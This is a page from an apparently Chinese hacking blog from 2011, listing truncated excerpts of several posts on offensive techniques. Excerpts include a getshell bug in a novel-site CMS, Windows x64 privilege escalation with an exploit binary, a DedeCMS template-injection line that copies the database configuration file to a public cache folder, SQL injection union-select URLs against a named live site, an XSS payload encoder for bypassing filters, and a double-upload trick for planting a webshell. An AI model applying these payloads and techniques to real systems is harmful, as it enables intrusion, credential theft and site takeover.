狂盗小说小偷GETshell漏洞及修复

分类:安全 | 2011-11-29 | 撸过 457 次
0人扯谈

很傻比的一漏洞
必须开启缓存才能利用
先看代码
book.php
$kd_cachedir = "./cache";
if($kd_book_cache=="ture"){//缓存必须开启
$lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
// echo $lastflesh;
if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60) <= time())){
ob_start();
include "./[......]

继续阅读

windows2003 x64 提权

分类:安全 | 2011-11-27 | 撸过 529 次
0人扯谈

最近看到很多基友遇到x64的版本素手无策,我最开始遇到的时候也折腾了好久,就写一下我提权的过程吧,无技术含量,本人表达能力不好,不喜勿喷,高手请飘过。

什么PR,IIS6,IIS7溢出对64位的版本都没有效果,包括LPK DLL截持,网上公布的X64提权0day好像也只有一个有效,就这个吧ms10048 x64。

先谈谈64位exp提权与32位exp提权的区别吧,我们平时执行exp的时候都是

c:\recycler\cmd.exe

/c c:\recycler\exp.exe "cmd"

但是x64有点蛋疼,不知道为什么cmd后面不能带参数执行(等待大牛分析)

只能这样执行

c:[......]

继续阅读

windows服务器手工杀毒要掌握的命令

分类:技术 | 2011-11-25 | 撸过 356 次
0人扯谈

作为站长我们有些时候是要手工清除服务器上的一些病毒,现在我司整理相关的网站资源,行文如下,希望“windows服务器手工杀毒要掌握的命令”这篇文章可以帮助vps主机和服务器托管用户彻底清除爱机上的病毒和木马!

 

【适合对象】

 

1、vps主机用户

 

2、服务器托管用户

 

3、服务器安全爱好者

 

一、TaskList命令备份系统进程

 

在刚装好系统的时候,最好使用TaskList命令将系统的进程做下备份,这样以后感觉电脑异常的时候可以通过比较进程列表,找出可能是病毒的进程

 

在命令提示[......]

继续阅读

手机QQ音乐播放器暴QQ密码

分类:安全 | 2011-11-23 | 撸过 403 次
0人扯谈

作者:Micro Da∵[达达] (转载请留下作者信息。尊敬他人的劳动成果。谢谢) 上次那个微信暴QQ密码文章被人转载了。还说是自己发现的洞。这次我就在图片上打了个水印。我看你怎么盗图片。 大牛别喷。。小菜我技术垃圾。

在参加西部安全会议前一天晚上发现了这个洞。。由于没电脑玩。只能玩手机了。。所以才用手机找到这个洞的。。。

这次是手机QQ音乐播放器暴QQ密码。只要安装QQ音乐播放器登入QQ。你的账号和密码就会记录在一个数据库里面。这次不同于上次发现的微信暴QQ密码。上次微信暴QQ密码那个还用了32位的MD5加密了。而且这次QQ播放器暴的QQ密码直接是明文。。

 

先说说操作放[......]

继续阅读

XSS代码加密脚本

分类:安全 | 2011-11-23 | 撸过 320 次
0人扯谈

用来bypass一些检测规则或者条件限制

XSS加密还是很常见很常见的。
'''

Python XSS payload encoder

Author: BGS (rstcenter.com)

Contributor cmiN (rstcenter.com)

Date: 13 August 2011

Version: Python 2.7

'''

#!/usr/bin/env python

import time

import sys

import urllib2

import base64
def main():
try:

if sys.argv[1] == "hel[......]

继续阅读

dede0day 利用小技巧

分类:安全 | 2011-11-18 | 撸过 363 次
0人扯谈

By:zafe

遇到可写不可执行的,可执行不可写的站的也许用的上

{dede:php}copy('../data/common.inc.php','../data/cache/test.txt');{/dede:php}

然后去xxx.com/data/cache/test.txt看数据库信息,如果是root那就happy吧

如果是普通用户,首先看下有哪些数据库:

//自行把{dede:php}{/dede:php}之间的内容替换成下面的,结果都是到data/cache/test.txt去看

$xdb = mysql_connect("localhost","[......]

继续阅读

win+php+mysql 注入实战篇

分类:安全 | 2011-11-18 | 撸过 451 次
0人扯谈

http://www.webshell.cc/answer_view.php?id=10291' //有注入
//常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4,8,2

//上火狐,报表.

https://www.webshell.cc/answer_view.php?id=10291%20[......]

继续阅读

PHP在线打包和解压工具

分类:工具 | 2011-11-16 | 撸过 433 次
0人扯谈

很久以前的东西了。。。留个记录

以后还得用。。。。。

 

 

下载: unzip

5种方法防止 jsp被sql注入

分类:安全 | 2011-11-14 | 撸过 446 次
0人扯谈

一、SQL注入简介

 

SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。

===========================================

 

二、SQL注入攻击的总体思路

 

1.寻找到SQL注入的位置

2.判断服务器类型和后台数据库类型

3.针对不通的服务器和数据库特点进行SQL注入攻击

===========================================

 

三、SQL注入攻击实例[......]

继续阅读

突破限制——双文件上传

分类:安全 | 2011-11-14 | 撸过 1,936 次
0人扯谈

下面是一个上传地址:

 
 

右键—查看源代码,修改2处代码:

 
 

修改后:

 
 

保存为1.html

 
 

第一个上传选择正常的jpg图片,第2个选择我们的马,
这里asp过滤了,所以我选择cdx

 
 

成功突破,
右键—查看源代码

 
 

菜刀连接:

第 1 页,共 3 页123